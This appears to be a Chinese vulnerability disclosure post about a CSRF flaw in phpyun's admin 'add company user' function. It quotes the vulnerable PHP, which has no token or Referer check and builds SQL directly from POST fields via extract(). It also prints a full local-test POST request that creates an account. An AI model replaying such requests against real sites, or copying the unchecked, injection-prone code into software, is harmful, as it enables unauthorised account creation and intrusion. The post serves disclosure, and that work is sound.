phpyun#csrf添加企业用户

  • A+
所属分类:漏洞时代
摘要

Xser出现在/admin/model/admin_company.class.php中没有验证token还有refer

所以导致csrf,本地测试下

提交请求包


漏洞作者:

Xser

详细说明:

出现在/admin/model/admin_company.class.php中

function add_action(){    $rating_list = $this->obj->DB_select_all("company_rating","`category`=1");    if($_POST['submit'])    {     extract($_POST);     if($username==""||strlen($username)<2||strlen($username)>15)     {      $msg = "会员名不能为空或不符合要求!";     }elseif($password==""||strlen($username)<2||strlen($username)>15){      $msg = "密码不能为空或不符合要求!";     }elseif($email==""){      $msg = "email不能为空!";     }else{      if($this->config['sy_uc_type']=="uc_center"){       $this->obj->uc_open();       $user = uc_get_user($username);      }else{       $user = $this->obj->DB_select_once("member","`username`='$username' OR `email`='$email'");      }      if(is_array($user))      {       $msg = "用户名或邮箱已存在!";      }else{       $ip = $this->obj->fun_ip_get();       $time = time();       if($this->config['sy_uc_type']=="uc_center")       {        $uid=uc_user_register($_POST['username'],$_POST['password'],$_POST['email']);        if($uid<0)        {         $this->obj->get_admin_msg("index.php?m=com_member&c=add","该邮箱已存在!");        }else{         list($uid,$username,$email,$password,$salt)=uc_get_user($username);         $value = "`username`='$username',`password`='$password',`email`='$email',`usertype`='2',`address`='$address',`status`='$status',`salt`='$salt',`moblie`='$moblie',`reg_date`='$time',`reg_ip`='$ip'";        }       }else{        $salt = substr(uniqid(rand()), -6);        $pass = md5(md5($password).$salt);        $value = "`username`='$username',`password`='$pass',`email`='$email',`usertype`='2',`address`='$address',`status`='$status',`salt`='$salt',`moblie`='$moblie',`reg_date`='$time',`reg_ip`='$ip'";       }       $nid = $this->obj->DB_insert_once("member",$value);       $new_info = $this->obj->DB_select_once("member","`username`='$username'");       $uid = $new_info['uid'];       if($uid>0)       {        $this->obj->DB_insert_once("company","`uid`='$uid',`name`='$name',`linktel`='$moblie',`linkmail`='$email',`address`='$address'");        $rat_arr = @explode("+",$rating_name);        $value = "`uid`='$uid',";        $value.=$this->rating_info($rat_arr[0]);        $this->obj->DB_insert_once("company_statis",$value);        $this->obj->DB_insert_once("friend_info","`uid`='$uid',`nickname`='$name',`usertype`='2'");        $msg="会员(ID:".$uid.")添加成功";       }      }     }     if($_POST['type']){      echo "<script type='text/javascript'>window.location.href='index.php?m=admin_company_job&c=show&uid=".$nid."'</script>";die;     }else{      $this->obj->ACT_layer_msg($msg,9,"index.php?m=admin_company",2,1);     }

 

没有验证token还有refer

所以导致csrf,本地测试下

提交请求包

POST /phpyun/phpyun/upload/admin/index.php?m=admin_company&c=add HTTP/1.1  Host: 127.0.0.1  Proxy-Connection: keep-alive  Content-Length: 211  Cache-Control: max-age=0  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  Origin: http://127.0.0.1  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36  Content-Type: application/x-www-form-urlencoded  Referer: http://127.0.0.1/phpyun/phpyun/upload/admin/index.php?m=admin_company&c=add  Accept-Encoding: gzip,deflate,sdch  Accept-Language: zh-CN,zh;q=0.8  Cookie: Hm_lvt_2a935166b0c9b73fef3c8bae58b95fe4=1411140464; bdshare_firstime=1411271506008; PHPSESSID=a65b349c297eaf372de3b329d7220db4; friend=0; friend_message=0; sysmsg=0; ashell=c0e024d9200b5705bc4804722636378a; remind_num=0    rating_name=3%2B%C3%E2%B7%D1%BB%E1%D4%B1&username=xssss&password=123456&email=10088055%40qq.com&moblie=132863&name=xss&address=xss&status=1&submit=%26%23160%3B%CC%ED+%BC%D3%26%23160%3B&pytoken=ebf2387fb39c&type=

 

构造表单就可以csrf了

如图

phpyun#csrf添加企业用户

成功添加

phpyun#csrf添加企业用户

修改用户资料那里也存在,就不一一提交了,在这里也随便提示了

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: